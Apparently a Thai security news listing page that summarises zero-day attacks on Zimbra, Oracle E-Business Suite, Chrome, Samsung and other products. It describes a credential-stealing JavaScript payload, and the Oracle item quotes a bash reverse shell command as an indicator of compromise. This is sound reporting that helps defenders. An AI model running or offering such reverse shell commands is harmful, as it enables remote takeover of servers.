สำนักงานความมั่นคงทางไซเบอร์ และโครงสร้างพื้นฐาน (CISA) ของสหรัฐฯ แจ้งเตือนการพบผู้โจมตีกำลังใช้ประโยชน์จากช่องโหว่ในการเรียกใช้คำสั่งที่เป็นอันตรายจากระยะไกลใน CentOS Web Panel (CWP) (more…)

กลุ่มผู้โจมตีทางไซเบอร์ที่มีความเชื่อมโยงกับจีน ที่ถูกติดตามภายใต้ชื่อ 'Bronze Butler' (Tick) ได้โจมตีโดยใช้ช่องโหว่ zero-day ของ Motex Lanscope Endpoint Manager เพื่อติดตั้งมัลแวร์ Gokcpdoor เวอร์ชันอัปเดตของพวกเขา

(more…)

ผู้ไม่หวังดีกำลังโจมตีโดยใช้ช่องโหว่ Zero-day (CVE-2025-11371) ในผลิตภัณฑ์ Gladinet CentreStack และ Triofox ซึ่งอาจทำให้ผู้โจมตีสามารถเข้าถึง system files บนเครื่องได้โดยไม่ต้องผ่านการยืนยันตัวตน

จนถึงขณะนี้ มีบริษัทตกเป็นเป้าหมายแล้วอย่างน้อย 3 ราย แม้ว่าจะยังไม่มีแพตช์สำหรับการแก้ไขออกมา แต่ผู้ใช้งานสามารถใช้วิธีการลดความเสี่ยงชั่วคราวไปก่อนได้ (more…)

Microsoft กำลังจำกัดการเข้าถึง Internet Explorer mode ในเบราว์เซอร์ Edge หลังจากได้รับข้อมูลว่ามีแฮ็กเกอร์กำลังโจมตีผ่านช่องโหว่แบบ Zero-day ใน Chakra JavaScript engine เพื่อเข้าถึงอุปกรณ์ของเป้าหมาย

Microsoft ไม่ได้เปิดเผยรายละเอียดทางเทคนิค แต่ระบุว่าผู้โจมตีได้ใช้เทคนิค social engineering ร่วมกับช่องโหว่ใน Chakra เพื่อให้สามารถเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกล (RCE) ได้ (more…)

นักวิจัยที่เฝ้าติดตาม .ICS calendar attachments ที่มีขนาดใหญ่ พบว่ามีการใช้ช่องโหว่ Zero-day ใน Zimbra Collaboration Suite (ZCS) เพื่อโจมตีมาตั้งแต่ช่วงต้นปีที่ผ่านมา

ไฟล์ ICS หรือ iCalendar เป็นไฟล์ที่ใช้สำหรับจัดเก็บข้อมูลปฏิทิน และตารางการนัดหมาย (เช่น การประชุม, อีเวนต์ และงานต่าง ๆ) ในรูปแบบ plain text และใช้เพื่อแลกเปลี่ยนข้อมูลดังกล่าวระหว่างแอปพลิเคชันปฏิทินต่าง ๆ

ผู้โจมตีได้ใช้ประโยชน์จากช่องโหว่หมายเลข CVE-2025-27915 ซึ่งเป็นช่องโหว่ประเภท Cross-Site Scripting (XSS) ที่พบใน ZCS เวอร์ชัน 9.0, 10.0 และ 10.1 เพื่อส่ง JavaScript payload ไปยังระบบของเป้าหมาย

ช่องโหว่ดังกล่าวเกิดจากการ sanitization เนื้อหา HTML ในไฟล์ ICS ที่ไม่เพียงพอ ทำให้ผู้โจมตีสามารถเรียกใช้โค้ด JavaScript ใด ๆ ก็ได้ภายใน session ของเหยื่อได้ เช่น การตั้งค่า filters อีเมลให้เปลี่ยนเส้นทางข้อความไปหาผู้โจมตี

ทาง Zimbra ได้แก้ไขช่องโหว่ด้านความปลอดภัยนี้เมื่อวันที่ 27 มกราคม ที่ผ่านมา โดยการออก ZCS เวอร์ชัน 9.0.0 P44, 10.0.13 และ 10.1.5 แต่ในขณะนั้นไม่ได้กล่าวถึงการโจมตีใด ๆ ที่เกิดขึ้นจริง

อย่างไรก็ตาม นักวิจัยจาก StrikeReady ซึ่งเป็นบริษัทผู้พัฒนาแพลตฟอร์มการจัดการภัยคุกคาม และการดำเนินงานด้านความปลอดภัยที่ขับเคลื่อนด้วย AI ได้ค้นพบการโจมตีดังกล่าว หลังจากที่คอยจับตาดูไฟล์ .ICS ที่มีขนาดใหญ่กว่า 10KB และมีโค้ด JavaScript แฝงอยู่ภายใน

ทีมวิจัยสรุปได้ว่า การโจมตีได้เริ่มต้นขึ้นตั้งแต่ช่วงต้นเดือนมกราคมที่ผ่านมา ก่อนที่ทาง Zimbra จะปล่อยแพตช์ออกมาแก้ไขเสียอีก

ผู้โจมตีได้ปลอมตัวเป็น “สำนักงานพิธีการของกองทัพเรือลิเบีย (Libyan Navy’s Office of Protocol)” และได้ส่งอีเมลที่มีมัลแวร์เพื่อโจมตีแบบ zero-day ไปยังองค์กรทางการทหารแห่งหนึ่งของบราซิล

อีเมลอันตรายดังกล่าวแนบไฟล์ ICS ที่มีขนาด 600KB ซึ่งภายในมีไฟล์ JavaScript ที่ถูกซ่อนโค้ดอันตรายด้วยวิธีการเข้ารหัสแบบ Base64

จากการวิเคราะห์ของทีมวิจัย พบว่า payload ถูกออกแบบมาเพื่อขโมยข้อมูลจาก Zimbra Webmail โดยเฉพาะ เช่น ข้อมูล credentials, อีเมล, รายชื่อผู้ติดต่อ และโฟลเดอร์ที่แชร์ร่วมกัน

StrikeReady ระบุว่า โค้ดอันตรายดังกล่าวถูกเขียนให้ทำงานใน asynchronous mode และทำงานผ่านฟังก์ชันที่เรียกว่า Immediately Invoked Function Expressions (IIFEs) ในรูปแบบต่าง ๆ โดยทีมวิจัยพบว่ามันสามารถทำงานได้ดังต่อไปนี้ :

สร้าง fields username/password แบบ hidden
ขโมยข้อมูล credentials จากการล็อกอิน
เฝ้าดูพฤติกรรมการใช้งานของผู้ใช้ (เมาส์ และคีย์บอร์ด) และบังคับออกจากระบบเมื่อไม่มีการใช้งาน เพื่อดักขโมยข้อมูลในการล็อกอินครั้งถัดไป
ใช้ Zimbra SOAP API เพื่อค้นหาโฟลเดอร์ และดึงข้อมูลอีเมล
ส่งเนื้อหาอีเมลไปยังผู้โจมตี (ทำซ้ำทุก ๆ 4 ชั่วโมง)
เพิ่ม filter ชื่อ "Correo" เพื่อส่งต่ออีเมลไปยังอีเมลแอดเดรสของ Proton
รวบรวมข้อมูลการ authentication/backup และแอบส่งออกไป
แอบส่งออกข้อมูลรายชื่อผู้ติดต่อ, รายชื่อกลุ่มผู้รับอีเมล และ shared folders
ตั้งค่าให้หน่วงเวลาก่อนเริ่มทำงาน 60 วินาที
บังคับให้มีการเว้นระยะการทำงาน 3 วัน (จะทำงานอีกครั้งก็ต่อเมื่อผ่านไปแล้วอย่างน้อย 3 วันจากการทำงานครั้งล่าสุด)
ซ่อน user interface (UI) เพื่อไม่ให้ผู้ใช้สังเกตเห็นความผิดปกติ

StrikeReady ยังไม่สามารถระบุแหล่งที่มาของการโจมตีครั้งนี้ได้อย่างแน่ชัดว่าเป็นฝีมือของกลุ่มผู้ไม่หวังดีกลุ่มใด แต่ตั้งข้อสังเกตว่ามีผู้โจมตีเพียงไม่กี่กลุ่มที่มีความสามารถในการค้นพบช่องโหว่ Zero-day ในผลิตภัณฑ์ที่ใช้กันอย่างแพร่หลายได้ พร้อมระบุเพิ่มเติมว่า “กลุ่มที่มีความเชื่อมโยงกับรัสเซียมีความช่ำชองในเรื่องนี้เป็นพิเศษ”

ทีมวิจัยยังระบุว่า กลยุทธ์, เทคนิค และขั้นตอน (TTPs) ที่คล้ายคลึงกันนี้ เคยถูกพบในการโจมตีที่เชื่อว่าเป็นฝีมือของกลุ่ม UNC1151 ซึ่งเป็นกลุ่มผู้ไม่หวังดีที่ Mandiant ระบุว่ามีความเชื่อมโยงกับรัฐบาลเบลารุส

ในรายงานของ StrikeReady ได้มีการเปิดเผยข้อมูล Indicators of Compromise และโค้ด JavaScript เวอร์ชันที่มีการ decode แล้ว ซึ่งเป็นโค้ดที่ใช้ในการโจมตีผ่านไฟล์ calendar .ICS ครั้งนี้

Update วันที่ 6 ตุลาคม 2025 : Zimbra ให้ข้อมูลกับ BleepingComputer โดยระบุว่า จากข้อมูลของทางบริษัท การใช้ช่องโหว่ดังกล่าวในการโจมตียังไม่ปรากฏว่ามีการโจมตีอย่างแพร่หลาย

นอกจากนี้ ทาง Zimbra ยังแนะนำให้ผู้ใช้ปฏิบัติตามขั้นตอนด้านความปลอดภัยดังต่อไปนี้ :

ตรวจสอบ filters อีเมลที่มีอยู่ทั้งหมดว่ามีการเปลี่ยนแปลงโดยไม่ได้รับอนุญาตหรือไม่
ตรวจสอบให้แน่ใจว่าโปรแกรม Zimbra ที่ติดตั้งไว้ ได้รับการอัปเดตเป็นแพตช์ล่าสุดแล้วหรือยัง
ตรวจสอบ message store ว่ามีรายการ .ICS ที่ถูก encode แบบ Base64 หรือไม่ และคอยเฝ้าดู traffic บนเครือข่ายเพื่อหาการเชื่อมต่อที่ผิดปกติ หรือน่าสงสัย

 

ที่มา : bleepingcomputer.

Oracle ออกคำเตือนเกี่ยวกับช่องโหว่ Zero-day ระดับ critical ในระบบ E-Business Suite ซึ่งมีหมายเลข CVE-2025-61882 โดยช่องโหว่นี้ทำให้ผู้โจมตีสามารถรันโค้ดที่เป็นอันตรายจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน และช่องโหว่นี้กำลังถูกนำไปใช้จริงในการโจมตีเพื่อขโมยข้อมูลจากกลุ่ม Clop

ช่องโหว่นี้อยู่ในผลิตภัณฑ์ Oracle Concurrent Processing ของ Oracle E-Business Suite (component: BI Publisher Integration) และมีคะแนน CVSS 9.8 เนื่องจากไม่ต้องผ่านการยืนยันตัวตน และสามารถถูกโจมตีได้ง่าย

ตามที่ Oracle ระบุไว้ในเอกสารคำแนะนำฉบับใหม่ว่า “การแจ้งเตือนด้านความปลอดภัยฉบับนี้มีขึ้นเพื่อจัดการกับช่องโหว่ CVE-2025-61882 ในระบบ Oracle E-Business Suite”

ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน โดยผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้ผ่านเครือข่ายได้ โดยไม่จำเป็นต้องมีชื่อผู้ใช้ หรือรหัสผ่าน และหากการโจมตีสำเร็จ อาจส่งผลให้เกิดการรันโค้ดที่เป็นอันตรายจากระยะไกลได้

Oracle ยืนยันว่า ช่องโหว่แบบ zero-day ดังกล่าว ส่งผลกระทบต่อระบบ Oracle E-Business Suite เวอร์ชัน 12.2.3 ถึง 12.2.14 และได้ออกแพตซ์อัปเดตฉุกเฉิน (emergency update) เพื่อแก้ไขช่องโหว่นี้แล้ว

บริษัทระบุว่า ลูกค้าจะต้องติดตั้ง Critical Patch Update ประจำเดือนตุลาคม 2023 ก่อน จึงจะสามารถติดตั้งแพตซ์อัปเดตความปลอดภัยชุดใหม่ได้

เนื่องจากมีการเปิดเผย PoC exploit ออกมาแล้ว และช่องโหว่นี้กำลังถูกใช้ในการโจมตีจริง จึงจำเป็นที่ผู้ดูแลระบบ Oracle จะต้องติดตั้งอัปเดตความปลอดภัยโดยเร็วที่สุด

ช่องโหว่ zero-day ดังกล่าวถูกนำไปใช้ในการโจมตีเพื่อขโมยข้อมูลโดยกลุ่ม Clop

แม้ว่า Oracle จะไม่ได้ระบุอย่างชัดเจนว่าช่องโหว่นี้เป็น zero-day แต่บริษัทได้เปิดเผย Indicators of Compromise (IoCs) ซึ่งสอดคล้องกับโค้ดการโจมตีใน Oracle EBS ที่กลุ่มผู้โจมตีแชร์กันเมื่อไม่นานมานี้บน Telegram

Charles Carmakal ประธานเจ้าหน้าที่ฝ่ายเทคนิค (CTO) ของ Mandiant – Google Cloud ยืนยันว่าช่องโหว่ CVE-2025-61882 และช่องโหว่อื่น ๆ ที่ Oracle แก้ไขไปเมื่อเดือนกรกฎาคมนั้น ถูกกลุ่มแรนซัมแวร์ Clop นำไปใช้โจมตี และขโมยข้อมูลจากเซิร์ฟเวอร์ Oracle E-Business Suite ในเหตุการณ์การขโมยข้อมูลเมื่อเดือนสิงหาคม 2025

Carmakal ระบุผ่าน LinkedIn ว่า “กลุ่ม Clop ได้ใช้ช่องโหว่หลายรายการใน Oracle EBS เพื่อขโมยข้อมูลจำนวนมากจากเหยื่อหลายรายในเดือนสิงหาคม 2025”

Carmakal ระบุเพิ่มเติมว่า มีการใช้ช่องโหว่หลายรายการในการโจมตี รวมถึงช่องโหว่ที่ถูกแพตช์ไปแล้วในการอัปเดตของ Oracle เมื่อเดือนกรกฎาคม 2025 และช่องโหว่ที่เพิ่งถูกแก้ไขไปเมื่อสุดสัปดาห์ที่ผ่านมา (CVE-2025-61882)

ข่าวเกี่ยวกับแคมเปญการโจมตีครั้งล่าสุดของกลุ่ม Clop ถูกเผยแพร่ครั้งแรกเมื่อสัปดาห์ที่แล้ว เมื่อทีม Mandiant และ Google Threat Intelligence Group (GTIG) รายงานว่ากำลังติดตามแคมเปญใหม่ที่มีหลายบริษัทได้รับอีเมลซึ่งอ้างว่ามาจากกลุ่มผู้โจมตี

อีเมลเหล่านั้นระบุว่ากลุ่ม Clop ได้ขโมยข้อมูลจากระบบ Oracle E-Business Suite ของบริษัท และกำลังเรียกค่าไถ่เพื่อไม่ให้ข้อมูลที่ขโมยไปถูกนำออกไปเผยแพร่สู่สาธารณะ

เนื้อหาในอีเมลที่ถูกเรียกค่าไถ่ที่มีการแชร์ให้กับ BleepingComputer ระบุว่า "พวกเรา CL0P team หากคุณยังไม่เคยได้ยินข้อมูลเกี่ยวกับเรา คุณสามารถค้นหาข้อมูลเกี่ยวกับเราได้ทาง Google บนอินเทอร์เน็ต"

“เราเพิ่งโจมตีไปที่ระบบ Oracle E-Business Suite ของคุณได้สำเร็จ และได้ Copy เอกสารจำนวนมากออกมา ตอนนี้ไฟล์ส่วนตัวทั้งหมด และข้อมูลอื่น ๆ ของคุณถูกเก็บอยู่ในระบบของเราแล้ว”

กลุ่ม Clop มีประวัติยาวนานในการใช้ประโยชน์จากช่องโหว่แบบ zero-day ทำการโจมตีเพื่อขโมยข้อมูลครั้งใหญ่หลายครั้งในช่วงหลายปีที่ผ่านมา อาทิเช่น

ปี 2020: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม Accellion FTA ส่งผลกระทบกับบริษัทเกือบ 100 องค์กร
ปี 2021: ใช้ช่องโหว่แบบ zero-day ในซอฟต์แวร์ SolarWinds Serv-U FTP
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม GoAnywhere MFT โจมตีบริษัทมากกว่า 100 องค์กร
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในระบบ MOVEit Transfer ซึ่งถือเป็นแคมเปญที่ใหญ่ที่สุดของกลุ่ม Clop จนถึงปัจจุบัน ทำให้สามารถขโมยข้อมูลจาก 2,773 องค์กรทั่วโลก
ปี 2024: ใช้ช่องโหว่ zero-day จำนวนสองรายการในระบบ Cleo file transfer (CVE-2024-50623 และ CVE-2024-55956) เพื่อขโมยข้อมูล และเรียกค่าไถจากบริษัทต่าง ๆ

ในเวลาต่อมากลุ่ม Clop ได้ยืนยันกับ BleepingComputer ว่า พวกเขาอยู่เบื้องหลังอีเมลเรียกค่าไถ่ และระบุว่าพวกเขาใช้ประโยชน์จากช่องโหว่ Oracle zero-day เพื่อขโมยข้อมูล

อย่างไรก็ตาม ในช่วงแรก Oracle ได้เชื่อมโยงแคมเปญการเรียกค่าไถ่ของกลุ่ม Clop เข้ากับช่องโหว่ที่ถูกแพตช์ไปแล้วในเดือนกรกฎาคม 2025 แทนที่จะเป็นช่องโหว่ zero-day ตัวใหม่ ที่ภายหลังถูกยืนยันว่าเป็นช่องโหว่ที่ใช้ในการโจมตีครั้งนี้

Oracle ได้เปิดเผย IoCs สำหรับการโจมตีจากช่องโหว่ zero-day ซึ่งมี 2 IP addresses ที่พบว่าถูกใช้ในการโจมตีเซิร์ฟเวอร์ และคำสั่งที่ใช้เปิด remote shell รวมไปถึง exploit archive และไฟล์ที่เกี่ยวข้องในการโจมตี ดังนี้

200[.]107[.]207[.]26 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
185[.]181[.]60[.]11 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
sh -c /bin/bash -i >& /dev/tcp// 0>&1 - คำสั่งที่เรียกใช้งาน reverse shell
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d - oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.

Apple เผยแพร่การอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ Zero-Day ที่ถูกเปิดเผยในเดือนสิงหาคม 2025 ไปยัง iPhone และ iPad รุ่นเก่า เนื่องจากพบว่าช่องโหว่ดังกล่าวได้ถูกนำไปใช้ในการโจมตีที่มีความซับซ้อนสูง (more…)

Google ออกแพตซ์อัปเดตความปลอดภัยฉุกเฉินเพื่อแก้ไขช่องโหว่ zero-day บน Chrome ซึ่งนับเป็นช่องโหว่ที่กำลังถูกใช้ในการโจมตีเป็นครั้งที่หกตั้งแต่ต้นปีนี้ (more…)

Samsung ได้เผยแพร่การอัปเดตความปลอดภัยสำหรับ Android ซึ่งรวมถึงการแก้ไขช่องโหว่ด้านความปลอดภัยที่ถูกระบุว่ามีการนำไปใช้ในการโจมตีแบบ Zero-Day แล้ว

ช่องโหว่ CVE-2025-21043 (CVSS Score : 8.8) เป็นช่องโหว่ out-of-bounds write ที่อาจทำให้ผู้โจมตีสามารถรันโค้ดตามต้องการได้

Samsung ระบุใน advisory ว่า “Out-of-bounds Write ใน libimagecodec.

พบผู้โจมตีกำลังใช้ประโยชน์จากช่องโหว่ zero-day ในการติดตั้ง Sitecore รุ่นเก่าเพื่อติดตั้งมัลแวร์ WeepSteel reconnaissance (more…)